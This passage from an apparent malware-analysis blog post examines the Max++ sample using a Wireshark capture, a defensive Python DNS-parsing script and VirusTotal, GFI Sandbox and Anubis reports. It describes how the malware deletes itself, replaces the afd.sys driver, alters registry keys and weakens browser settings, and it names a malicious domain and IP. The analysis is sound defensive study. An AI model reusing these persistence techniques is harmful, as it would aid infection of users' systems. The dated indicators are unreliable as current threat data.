<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlW6S2wTkgGm82PkCMmqu-doq8QeTawmsjMl4j1qBdPD7RBOPa9_BeiWxJ4FiXCBuTGsb0bRWcxFrcx2mGwPXOj1D-aHbmjXa5nIrXI5MxA1QueKxmY1R2_MF0GeiaTNY4F3iWTNDA_OdB/s1600/Figure+1-5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlW6S2wTkgGm82PkCMmqu-doq8QeTawmsjMl4j1qBdPD7RBOPa9_BeiWxJ4FiXCBuTGsb0bRWcxFrcx2mGwPXOj1D-aHbmjXa5nIrXI5MxA1QueKxmY1R2_MF0GeiaTNY4F3iWTNDA_OdB/s640/Figure+1-5.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.5 - Wireshark captures packets from the Windows XP system infected with Max++</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">We can get more information on the IP address and domain name with the “whois” and “traceroute” commands in a Linux terminal (“tracert” on Windows); many hosting sites also provide a DNS lookup service. Note that such indicators are only valid at the time of the capture, since malware domains are moved and re-registered, so record the capture date alongside them. Giuseppe Bonfa [2] in his article traces the crimeware origins of the Max++ malware and links it to the Russian Syndicate Network, which is a known malware-friendly environment.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
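<div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The DNS lookup that Wireshark displayed in Figure 1.5 can also be recovered programmatically, which is useful when a capture is too large to read by hand. The following Python script is an added example and not part of the original article: it parses raw DNS messages (the UDP payload that Wireshark decodes), follows the name-compression pointers that real responses use in the answer section, and pairs each response with its query by transaction ID to produce the list of names the infected guest looked up together with the addresses they resolved to. The two messages it runs on are constructed here from the domain and address seen in the capture; they are not bytes from my capture, and the transaction ID is arbitrary.</span></div>

```python
import struct

# Indicators taken from the capture described above; the messages built from
# them below are constructed for this example, not bytes from the capture.
WATCHED_NAME = "intensedive.com"
WATCHED_IP = "64.74.223.42"


def encode_name(name):
    """Encode a dotted hostname as length-prefixed DNS labels plus a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode("ascii")
                    for label in name.split(".")) + b"\x00"


def build_query(txid, name):
    """Standard recursive A query for `name` (constructed sample)."""
    header = struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0)      # RD set, 1 question
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # type A, class IN


def build_response(txid, name, ip, ttl=300):
    """Response to build_query carrying one A record (constructed sample).
    The answer's NAME is the compression pointer 0xC00C, i.e. "the name at
    offset 12", which is how real resolvers refer back to the question."""
    question = build_query(txid, name)[12:]
    header = struct.pack("!6H", txid, 0x8180, 1, 1, 0, 0)      # QR, RD, RA; 1 answer
    rdata = bytes(int(octet) for octet in ip.split("."))
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def read_name(msg, offset):
    """Decode the name at `offset`, following compression pointers.
    Returns (name, offset just past the name as it appears in the message)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[offset]
        if length == 0:
            offset += 1
            break
        if length // 64 == 3:                      # top two bits set: 14-bit pointer
            target = struct.unpack("!H", msg[offset:offset + 2])[0] % 0x4000
            if not jumped:
                end = offset + 2                   # a pointer ends the name in place
            jumped = True
            offset = target
            continue
        offset += 1
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def parse_dns(msg):
    """Parse the header, question and answer sections of one DNS message."""
    txid, flags, qdcount, ancount, _ns, _ar = struct.unpack("!6H", msg[:12])
    offset, questions, answers = 12, [], []
    for _ in range(qdcount):
        name, offset = read_name(msg, offset)
        qtype, _qclass = struct.unpack("!HH", msg[offset:offset + 4])
        offset += 4
        questions.append((name, qtype))
    for _ in range(ancount):
        name, offset = read_name(msg, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:              # A record: render as dotted quad
            rdata = ".".join(str(octet) for octet in rdata)
        answers.append((name, rtype, ttl, rdata))
    return {"id": txid, "response": flags // 0x8000 == 1,
            "questions": questions, "answers": answers}


def match_lookups(messages):
    """Pair responses with their queries by transaction ID.
    Returns (queried name, [IPv4 addresses]) pairs in capture order, the same
    summary the Wireshark packet list gives at a glance."""
    pending, lookups = {}, []
    for msg in messages:
        parsed = parse_dns(msg)
        names = [name for name, _qtype in parsed["questions"]]
        if not parsed["response"]:
            pending[parsed["id"]] = names
            continue
        asked = pending.pop(parsed["id"], names)
        ips = [rdata for _n, rtype, _ttl, rdata in parsed["answers"] if rtype == 1]
        lookups.append((asked[0] if asked else "", ips))
    return lookups


SAMPLE_TRAFFIC = [
    build_query(0x1A2B, WATCHED_NAME),
    build_response(0x1A2B, WATCHED_NAME, WATCHED_IP),
]
```

<div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">match_lookups(SAMPLE_TRAFFIC) returns [("intensedive.com", ["64.74.223.42"])]. To apply it to a real capture, feed it the UDP payloads of the port 53 packets, for example exported from Wireshark or read with a pcap library; any name that an otherwise idle guest resolves to a public address is worth a whois lookup.</span></div>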
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: large; line-height: 115%;"><b>3. File System and Registry Behavior</b></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">In the previous section we saw that Max++ silently transmits data. Let us now analyze which files and registry items are modified by the malware. A simple way to get an initial report on a sample is to use free web services such as Anubis, GFI Sandbox and VirusTotal, all of which accept the sample file through a web form. VirusTotal only scans the file with many antivirus engines, whereas Anubis and GFI Sandbox actually run the malware in an isolated environment and report what it does. Below I present the results for the Max++ malware from VirusTotal, GFI Sandbox and Anubis.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: large; line-height: 115%;"><b>3.1 VirusTotal Results for Max++</b></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">I submitted the Max++ executable to VirusTotal; <i>Figure 1.6</i> shows the analysis summary. At the time of my submission VirusTotal ran 43 antivirus scanners, and 39 of them detected the file as malware. The summary also includes the SHA256 hash of the file, which is the identifier to record and share, since the filename changes from sample to sample. <i>Figure 1.7</i> lists all the scanners used and which of them detected the sample. Each scanner has its own signatures, and the table shows the benefit of running many of them: not every scanner detects the file as malware, so a single clean verdict proves little.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjKPjp7ggJLeSRMDkRi8LVs98ebQEDtaxJ9-ShSBWpDH8nhwT1np7wdKxbxoBeurYjJoMNKnD9VXQ1y37B0LSp_3EEFMBA0b0DA6ScC_SmkE6zkTHf3Wv8ibNTHUsXpfYB376hJdqQiFv8/s1600/Figure+1-6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjKPjp7ggJLeSRMDkRi8LVs98ebQEDtaxJ9-ShSBWpDH8nhwT1np7wdKxbxoBeurYjJoMNKnD9VXQ1y37B0LSp_3EEFMBA0b0DA6ScC_SmkE6zkTHf3Wv8ibNTHUsXpfYB376hJdqQiFv8/s640/Figure+1-6.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.6 - VirusTotal analysis summary for Max++</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div class="separator" style="clear: both; font-size: 11pt; text-align: center;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtEMDJDam3LfCz7OiqhTWjzET_43AxRxgq03Z93kjWJWr2ireU6fCG6YnOFRw1mkCDl30N_FEvnEmB4d_DQ6pDV0S9GwFgIf34gBg35xH38MNgwY3zON85caCz2XLQJjmjmnmr8nA8tAfD/s1600/Figure+1-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="609" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtEMDJDam3LfCz7OiqhTWjzET_43AxRxgq03Z93kjWJWr2ireU6fCG6YnOFRw1mkCDl30N_FEvnEmB4d_DQ6pDV0S9GwFgIf34gBg35xH38MNgwY3zON85caCz2XLQJjmjmnmr8nA8tAfD/s640/Figure+1-7.png" width="640" /></a></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicGpdiK884X0VsfMJywQyum62ePEqocTJBafaMyoillSLAMU3JVfTGKeZYldeYJsnNw-Ekf4HW_mNsre0NUm2xAq7pSVbjukdTFgBlGpUsyUbNFiWZ0oTI1qTPa8cf6WBA9elSzXCY7eeW/s1600/Figure+1-7+(2).png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="566" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicGpdiK884X0VsfMJywQyum62ePEqocTJBafaMyoillSLAMU3JVfTGKeZYldeYJsnNw-Ekf4HW_mNsre0NUm2xAq7pSVbjukdTFgBlGpUsyUbNFiWZ0oTI1qTPa8cf6WBA9elSzXCY7eeW/s640/Figure+1-7+(2).png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.7 - List of antivirus scanners used by VirusTotal and the detection count</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">VirusTotal also provides a list of all the different filenames under which the same file has been submitted, shown in <i>Figure 1.8</i>.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSuBPNHXhDk9M01yZGidgnaxE15k2iObIVW88abu5XZmyUDRZTlL5iGwZQNza7G5DbdHpQVYSxlJzstH1Vs0yOpLJUAWtJarAJ7XRZ-QUHT8qLmaLunxIRAaGpx0x_BHsQG4fScfPT_wPK/s1600/Figure+1-8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSuBPNHXhDk9M01yZGidgnaxE15k2iObIVW88abu5XZmyUDRZTlL5iGwZQNza7G5DbdHpQVYSxlJzstH1Vs0yOpLJUAWtJarAJ7XRZ-QUHT8qLmaLunxIRAaGpx0x_BHsQG4fScfPT_wPK/s400/Figure+1-8.png" width="317" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.8 - Other names that have been associated with the same malware by VirusTotal</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="line-height: 115%;"><span style="font-size: large;"><b>3.2 GFI Sandbox Results for Max++</b></span></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">I submitted the Max++ executable to GFI Sandbox, and below are the results for my submission. GFI Sandbox actually runs the file in a remote isolated environment and returns a quick analysis of the infected system.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><i><span style="font-size: 11pt; line-height: 115%;"><br />
</span></i></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><i><span style="font-size: 11pt; line-height: 115%;">Figure 1.9</span></i><span style="font-size: 11pt; line-height: 115%;"> shows the analysis summary returned by GFI Sandbox. It gives the MD5 hash and size of the file and the number of processes the sample starts on the system, which is 3 for Max++. It also names the sandbox system used; in this analysis the malware was executed on Windows XP Service Pack 3. Later, in the detailed Anubis report, we are also given the names of those processes and the files they create, delete and modify. The second table in <i>Figure 1.9</i>, the digital behavior traits section, gives an overview of the actions taken by the malware: Max++ spawns new services, deletes its original executable, injects code, and modifies files and registry keys on the infected system.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1tgbhz9VXM0ifvucerxTRPQiOb2MEK8gADCs_pAzOH6cD29WmV_2JxMTZlYqwe7Fo3cv577OVmKvZ4dA4iuqj-oiHHXrT7f8-jcjEp47ygj0YE_XGM3va38VQsZv-LRboZlNDBP0qw7i/s1600/Figure+1-9.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1tgbhz9VXM0ifvucerxTRPQiOb2MEK8gADCs_pAzOH6cD29WmV_2JxMTZlYqwe7Fo3cv577OVmKvZ4dA4iuqj-oiHHXrT7f8-jcjEp47ygj0YE_XGM3va38VQsZv-LRboZlNDBP0qw7i/s640/Figure+1-9.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.9 - Analysis summary provided by GFI Sandbox</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">The report also lists the files deleted by the malware. <i>Figure 1.10</i> shows that the original executable is deleted by the malware's own process, which is the self-deletion we observed in section 2.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqxFkM2EJmxFyZRc7TCNCuNwVhyARQ8wqECggmhfFYRfRPskiR6WLdcnFjIKDMexh8wIV7i0e1EMfCyvC6bS3bFOSgYNFmNH7lnr3wVc3DAZLuZfNPEfRU8w5RW4RCvT40Xapr-lslof1S/s1600/Figure+1-10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqxFkM2EJmxFyZRc7TCNCuNwVhyARQ8wqECggmhfFYRfRPskiR6WLdcnFjIKDMexh8wIV7i0e1EMfCyvC6bS3bFOSgYNFmNH7lnr3wVc3DAZLuZfNPEfRU8w5RW4RCvT40Xapr-lslof1S/s640/Figure+1-10.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.10 - GFI Sandbox report of files deleted by the Max++ executable</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmQcmg46TKvKHLR2AXwfmRtBPnOnx30EjHVt3kDbix0Z7gn3KEqBdtfOvkO4d0gQnVjsbDa0yPjxZEMmjjq-8N-0682Qa1vde_nuQPCbuqD3Ehw29tPqsGna8jMBtsYjsyrBAq06L44c_R/s1600/Figure+1-11.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmQcmg46TKvKHLR2AXwfmRtBPnOnx30EjHVt3kDbix0Z7gn3KEqBdtfOvkO4d0gQnVjsbDa0yPjxZEMmjjq-8N-0682Qa1vde_nuQPCbuqD3Ehw29tPqsGna8jMBtsYjsyrBAq06L44c_R/s640/Figure+1-11.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.11 - GFI Sandbox report of files created and modified by the Max++ executable</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">Not only does Max++ remove the original file that infected the system, it also creates and modifies files in the Windows system folders. Specifically, <i>Figure 1.11</i> shows that three files are created under the Windows system32 folder: “afd.sys” and “afd.sys.new” are added to the drivers folder, and “afd.sys.new” is also added to the “dllcache” folder. afd.sys is the Ancillary Function Driver for WinSock, a legitimate driver present on every Windows XP system, so a fresh copy being written by the sample is a strong indication that the malware is replacing a system driver with an infected one; comparing the hash of the new afd.sys with the one from a clean installation is the quickest way to check. The dllcache folder is the cache from which Windows File Protection restores tampered system files, which is presumably why the malware writes its copy there as well.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">GFI Sandbox also lists the registry values set by the malware. <i>Figure 1.12</i> shows four modifications. The first three change values under the “ControlSet001” key; they appear to register the “afd” driver service, whose file we saw Max++ write, so that it is started at system boot. The fourth modification is to a value belonging to the <i>Internet Explorer</i> browser and most likely weakens the browser's security settings. Also in <i>Figure 1.12</i>, under the network traffic table, a connection to the IP address “10.20.25.255” is reported. Note that this is a private (RFC 1918) address, and with a last octet of 255 it looks like the broadcast address of the sandbox's own /24 network, so it reflects the sandbox environment rather than a connection to a remote command-and-control server; the real external contact is the one captured with Wireshark in section 2.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><br />
</span></div><div class="separator" style="clear: both; font-size: 11pt; text-align: center;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuN8r4F_IT8G85La9OlbawGgnxUMUrdFF-a0BvpGfD6hilGYctX45oc4ME9yAB16deSmrJD1YsGyqzcwEBXpctW_bJ_FLj4V87Lu2Ec-4pVz1rtbjyffICfAJesZkrj4L5nyfHb0nuzOmk/s1600/Figure+1-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuN8r4F_IT8G85La9OlbawGgnxUMUrdFF-a0BvpGfD6hilGYctX45oc4ME9yAB16deSmrJD1YsGyqzcwEBXpctW_bJ_FLj4V87Lu2Ec-4pVz1rtbjyffICfAJesZkrj4L5nyfHb0nuzOmk/s640/Figure+1-12.png" width="640" /></a></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLeKVWbmR3IVX9IQrCgqUQv3jzpBfLFV8QJ-GWQ7Rfng5Wlkvp6gQDYNJzuKDswA5A8mZNp9US5hwBrCFFlqeIuupiICOWsOS-0r0H1V3Gokoyi6yMwkQkXOcS2mJbL7Vcd5xodnlhAWG_/s1600/Figure+1-12+2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLeKVWbmR3IVX9IQrCgqUQv3jzpBfLFV8QJ-GWQ7Rfng5Wlkvp6gQDYNJzuKDswA5A8mZNp9US5hwBrCFFlqeIuupiICOWsOS-0r0H1V3Gokoyi6yMwkQkXOcS2mJbL7Vcd5xodnlhAWG_/s640/Figure+1-12+2.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.12 - GWISandbox report of registry keys modified and network connections made by Max++</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: large;"><b>3.3 Anubis Results for Max++</b></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">Of the three online services to which I submitted the malware sample for analysis, I found Anubis to produce the most complete and detailed report. The full report is extensive, and I will only discuss a portion of the results in this section.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0xBnhhBdXsLvOq2Re2cg3B4p8g3IyazVYtUULKXFZ0Xnp44pUBWBVL5I7KSoDDu3Q1IvaMXAg8EMz5LHCi-mKcZhi14hElu6WFItq_KY_LVj9mDUjAncE-ERTIjrR3_iB6ksySzh9IcaE/s1600/Figure+1-13.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0xBnhhBdXsLvOq2Re2cg3B4p8g3IyazVYtUULKXFZ0Xnp44pUBWBVL5I7KSoDDu3Q1IvaMXAg8EMz5LHCi-mKcZhi14hElu6WFItq_KY_LVj9mDUjAncE-ERTIjrR3_iB6ksySzh9IcaE/s640/Figure+1-13.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.13 - Anubis analysis summary for the Max++ executable</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">The analysis summary of the Anubis report can be seen in <i>Figure 1.13</i>. We are given a description of the actions Max++ performs as well as the associated risk, which is color coded and ranges from low to high. The first behavior Anubis observed is that Max++ changes the security settings of Internet Explorer. This is supported by the GWISandbox analysis, which reported that a registry key for <i>Internet Explorer</i> had been modified. Anubis identifies this change as a medium risk to the system. Anubis also reports that Max++ creates, modifies, and deletes files on the computer, which it classifies as a high risk to the system. From the GWISandbox report we know the original malware file is deleted and other files are added to the system folder. We also know three processes are run by the Max++ executable, and Anubis reports the same here. The last behavior observed relates to the registry keys that are read, created, modified, and monitored by the malware; Anubis reports this behavior as a low risk to the system.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFVDZ_TI6K7HNbDj-2WCBunx9z9T7TsFSS4Qa9U9kc9CNCw7gaeAMsh87EzNc_9EqAuD9cYcRxvgNfUPWfGkEgl0KDBn3cqGeiHZRH3cqix4PvtxunolUn4cHV4BCiBv_o26EWVmVyOuZL/s1600/Figure+1-14.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFVDZ_TI6K7HNbDj-2WCBunx9z9T7TsFSS4Qa9U9kc9CNCw7gaeAMsh87EzNc_9EqAuD9cYcRxvgNfUPWfGkEgl0KDBn3cqGeiHZRH3cqix4PvtxunolUn4cHV4BCiBv_o26EWVmVyOuZL/s640/Figure+1-14.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.14 - Anubis analysis of modules loaded at execution of Max++</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">From Anubis we can also tell which modules are loaded at runtime by the Max++ malware. <i>Figure 1.14</i> lists the loaded DLLs. Among them is “ntdll.dll”, and we will later see, using a debugger, how the malware locates this module and creates its own functions to do its work.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8p2xkSQNSTzVG4YdNx_bTRiABtnN9Sp-WnObr9EOe-65zAvRuYSKJfSmrtUzSiLLVdRHLgZNoSbfqb3-JPYEaMXVBJNKVZJQu0ODOLk_sbD-6JSJOC3IUQzKxabVFfXMKX8lw9uJNs8WA/s1600/Figure+1-15.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8p2xkSQNSTzVG4YdNx_bTRiABtnN9Sp-WnObr9EOe-65zAvRuYSKJfSmrtUzSiLLVdRHLgZNoSbfqb3-JPYEaMXVBJNKVZJQu0ODOLk_sbD-6JSJOC3IUQzKxabVFfXMKX8lw9uJNs8WA/s640/Figure+1-15.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.15 - Anubis analysis of the file activity of the Max++ primary process</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">As we saw in the initial Anubis summary, three processes are executed by the malware. In <i>Figure 1.15</i> we see the file activity of the main Max++ process. The file “appcompat.txt” is created in a temporary folder, and the main process also reads data from the module “winsock.dll”.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
